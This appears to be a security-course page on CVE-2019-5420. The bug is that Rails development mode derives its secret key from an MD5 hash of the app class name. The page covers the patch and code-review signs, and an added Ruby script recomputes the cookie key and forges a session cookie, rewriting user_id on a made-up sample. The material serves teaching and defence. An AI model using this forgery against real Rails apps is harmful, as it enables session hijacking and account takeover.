cve-2019-5420 II
This exercise details the exploitation of CVE-2019-5420 to gain code execution
In this course, we delve into a specific vulnerability (CVE-2019-5420) present in Ruby on Rails applications running in development mode. The vulnerability arises from the application deriving its secret_key_base, and therefore its session cookie key, from the application's class name, so an attacker who knows or guesses the app name can recompute the key. Once the key is known, attackers can decrypt, tamper with, and re-encrypt session data, which leads to code execution when the session is serialized with Marshal, since the application deserializes attacker-controlled data. The fix shipped in Rails 5.2.2.1 and 6.0.0.beta3 replaces the predictable value with a randomly generated development secret.
We begin by understanding the bug and reviewing the patch that addresses it. The course then guides you through a step-by-step exploitation process, leveraging knowledge from the previous exercises ruby_ugadget and CVE-2019-5420. By following along, you'll learn how to inspect cookie values, use deserialization gadgets, and execute payloads to achieve code execution. The course concludes with practical tips on identifying the issue during code reviews (a Rails version before the fix, development mode exposed to untrusted clients, and no explicit secret_key_base) and on exploiting ActiveStorage if it is used by the application.
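The key derivation that makes this exploitable, and the decrypt-tamper-re-encrypt step it enables, as an added example that is not the course's own code or material from Rails. It assumes Rails 5.2 defaults (AES-256-GCM authenticated cookies, 1000 PBKDF2 iterations, the JSON cookie serializer) and an application class named Blog::Application; the app name and the sample cookie are constructed here, not taken from the exercise. The RCE chain through a Marshal serializer and a deserialization gadget is the subject of the course and is not reproduced.

```ruby
# Added example (not from the course or from Rails itself). Reproduces the
# predictable secret_key_base of CVE-2019-5420 and shows that knowing the app
# class name is enough to decrypt, tamper with, and re-encrypt a session cookie.
# Assumptions: Rails 5.2 defaults (aes-256-gcm cookies, 1000 PBKDF2 iterations,
# JSON serializer) and an app class named "Blog::Application" (assumed name).
require "digest"
require "json"
require "openssl"

# Vulnerable development-mode fallback in Rails::Application#secret_key_base
# (Rails < 5.2.2.1): secrets.secret_key_base || Digest::MD5.hexdigest(self.class.name)
def development_secret_key_base(app_class_name)
  Digest::MD5.hexdigest(app_class_name)
end

# ActiveSupport::KeyGenerator#generate_key as configured by Rails:
# PBKDF2-HMAC-SHA1, 1000 iterations, with a fixed salt that is public knowledge.
COOKIE_SALT = "authenticated encrypted cookie".freeze
ITERATIONS = 1000

def cookie_key(secret_key_base)
  OpenSSL::PKCS5.pbkdf2_hmac_sha1(secret_key_base, COOKIE_SALT, ITERATIONS, 32)
end

# ActiveSupport::MessageEncryptor wire format for aes-256-gcm:
#   base64(ciphertext)--base64(iv)--base64(auth_tag)
# (the Set-Cookie header additionally URL-encodes it, so CGI.unescape a real one first).
def encrypt_cookie(key, plaintext)
  cipher = OpenSSL::Cipher.new("aes-256-gcm")
  cipher.encrypt
  cipher.key = key
  iv = cipher.random_iv
  cipher.auth_data = ""
  ciphertext = cipher.update(plaintext) + cipher.final
  [ciphertext, iv, cipher.auth_tag].map { |part| [part].pack("m0") }.join("--")
end

def decrypt_cookie(key, cookie)
  ciphertext, iv, tag = cookie.split("--").map { |part| part.unpack1("m0") }
  cipher = OpenSSL::Cipher.new("aes-256-gcm")
  cipher.decrypt
  cipher.key = key
  cipher.iv = iv
  cipher.auth_tag = tag
  cipher.auth_data = ""
  cipher.update(ciphertext) + cipher.final # raises CipherError if the key is wrong
end

# Attacker side: guess the app class name, rebuild the key, rewrite the session.
# With a Marshal serializer the rewritten payload would be a deserialization
# gadget instead of JSON; that chain is covered by the exercise, not here.
def forge_session(cookie, app_class_name, changes)
  key = cookie_key(development_secret_key_base(app_class_name))
  session = JSON.parse(decrypt_cookie(key, cookie))
  encrypt_cookie(key, JSON.generate(session.merge(changes)))
end

# Constructed sample: the cookie a vulnerable "Blog::Application" running in
# development mode would issue for user 42 (assumed app name, not from the page).
SERVER_KEY = cookie_key(development_secret_key_base("Blog::Application"))
SAMPLE_COOKIE = encrypt_cookie(SERVER_KEY, JSON.generate("user_id" => 42))

if __FILE__ == $PROGRAM_NAME
  forged = forge_session(SAMPLE_COOKIE, "Blog::Application", "user_id" => 1)
  puts decrypt_cookie(SERVER_KEY, forged)
end
```

A wrong guess of the app name produces a different key and the GCM tag check fails, so guessing is cheap to verify against a captured cookie: one decryption attempt per candidate name. Applications created without `load_defaults 5.2` use AES-256-CBC with a separate HMAC key and the salts "encrypted cookie" and "signed encrypted cookie" instead; the secret_key_base derivation is the same.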